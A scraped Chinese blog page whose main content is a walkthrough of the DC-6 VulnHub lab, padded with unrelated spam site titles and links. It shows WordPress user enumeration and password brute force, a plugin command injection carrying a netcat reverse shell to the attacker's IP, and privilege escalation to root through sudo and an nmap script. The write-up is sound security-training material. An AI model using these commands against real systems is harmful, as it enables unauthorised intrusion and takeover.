当前位置: 首页 > news >正文

闽侯县建设局网站东营网站建设优选案例

闽侯县建设局网站,东营网站建设优选案例,分析网站的外链,网站开发能赚多少钱文章目录一、环境搭建二、渗透流程三、思路总结一、环境搭建 DC-6下载地址#xff1a;https://download.vulnhub.com/dc/DC-6.zip kali#xff1a;192.168.144.148 DC-6#xff1a;192.168.144.154 靶机描述#xff1a;选择带k01的密码后面会用到 访问192.168.144.154https://download.vulnhub.com/dc/DC-6.zip kali192.168.144.148 DC-6192.168.144.154 靶机描述选择带k01的密码后面会用到 访问192.168.144.154地址栏上方的ip变成了域名http://wordy添加host文件 二、渗透流程 nmap -A -T5 -sV -sT -p- 192.168.144.154思路 1、80端口 目录扫描dirb、gobuster、dirsearch等工具 web站点资产识别goby、whatweb等 web站点功能页面 分析网页源代码 …… 2、22端口 ssh爆破、有账号密码信息进行远程登录 …… 目录扫描结果 http://wordy/wp-login.php #后台管理页面 http://wordy/wp-includes/ #网站目录#指纹探测 whatweb http://wordy思路web站点是Wordpress CMS 1、Wordpress版本漏洞 2、Wordpress插件漏洞 3、后台地址账号密码爆破 #枚举网站用户 wpscan --url http://wordy -e u#利用枚举到的网站用户名进行爆破 #筛选出有k01的密码保存到新的字典passwords.txt中 cat /usr/share/wordlists/rockyou.txt | grep k01 passwords.txt wpscan --url http://wordy -U admin,mark,jens,sarch,graham -P passwords.txt#ssh登录失败 ssh mark192.168.144.154登录后台管理页面 用户名密码 markhelpdesk01 管理页面地址http://wordy/wp-login.php#Activity monitor组件 searchsploit activity monitor #后两个命令注入和远程代码执行都可以加以利用#查看45274.html 命令1cat /usr/share/exploitdb/exploits/php/webapps/45274.html 命令2file:///usr/share/exploitdb/exploits/php/webapps/45274.html #修改45274.html cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html vim 45274.html #修改为如下内容#kali开启监听 nc -lnvp 4444 #浏览器访问45274.html点击submit,反弹shell未成功点击Lookup按钮抓包#burpsuite抓包 修改命令为127.0.0.1 | nc -e /bin/sh 192.168.144.148 4444 反弹shell成功#利用python切换到bash环境 python -c import pty;pty.spawn(/bin/bash)cat /home/mark/stuff/things-to-do.txt #该文件下存在账号密码graham - GSo7isUM1D4#利用获取的账号密码登录 ssh graham192.168.144.154sudo -l cat /home/jens/backups.sh #backups.sh文件内容是对网站的打包命令作用是备份网站根目录。sudo -l #jens用户不需要密码就可以执行backups.sh文件echo /bin/bash backups.sh sudo -u jens ./backups.shsudo -l #显示当前用户可以用sudo执行哪些命令 #在jens的shell下可以在不需要密码的情况下以root的身份权限执行nmap #利用nmap的--script参数执行反弹shell脚本 echo os.execute(/bin/sh) getShell.nse sudo nmap --script./getshell.nse这里有个问题获取到root权限之后页面输入的命令看不见但是可以执行。 三、思路总结 1、信息收集 2、暴力破解登录Wordpress后台 3、利用Wordpress CMS组件漏洞反弹shell 4、ssh远程登录后寻找可以执行sudo命令的操作 5、写入nmap反弹shell脚本
http://www.hkea.cn/news/14404668/

相关文章:

  • 十年经验网站开发企业wordpress飘花特效
  • 网站系统解决方案WordPress主题安全检查
  • 国内做设计的网站有哪些方面程序员做项目的网站
  • 上海自建网站如何创建网站的第一步
  • 郓城县住房和建设局网站网站开发 前端 后端 如何结合
  • 新手做视频网站好荣成信用建设网站
  • 新手做网页做那个网站简单电子商务就是建网站
  • 怎样写网站描述视频永久免费生成二维码
  • 网站建设标新立异springcloud项目搭建
  • 网站空间去哪买专业做制作网站
  • 物流官网网站广州做外贸网站的公司
  • 有没有做机械加工的网站怎么做有趣的短视频网站
  • 刚做的单页网站怎么预览短网址在线生成免费
  • 利用万网做网站二手车网站制作
  • 做网站预算标杆网站建设
  • 阿里云网站建设教学视频教程公司内部网站怎么建设
  • 贵州省铁路建设办公室网站免费的心理咨询平台
  • 新网站建设的流程大型网站 建设意义
  • wordpress 修改语言包潍坊seo排名
  • 织梦确定网站风格广东省城乡建设部网站
  • 大连html5网站建设新网登录网站后台
  • 聚美优品网站开发时间进度表wordpress编辑器哪个好用吗
  • aardio 网站开发营销网站建设企业
  • 新闻cms静态网站模板下载丽江市建设局网站
  • 缙云做网站公司备案号在哪里查询
  • 下载的网站模板怎么编辑wordpress 专题页面
  • 古镇网站建设衡水网站建设优化推广
  • 个人网站介绍网站点击量设计
  • 查网站备案名称集团门户网站建设
  • 淘宝客网站如何做推广方案wordpress用户注册积分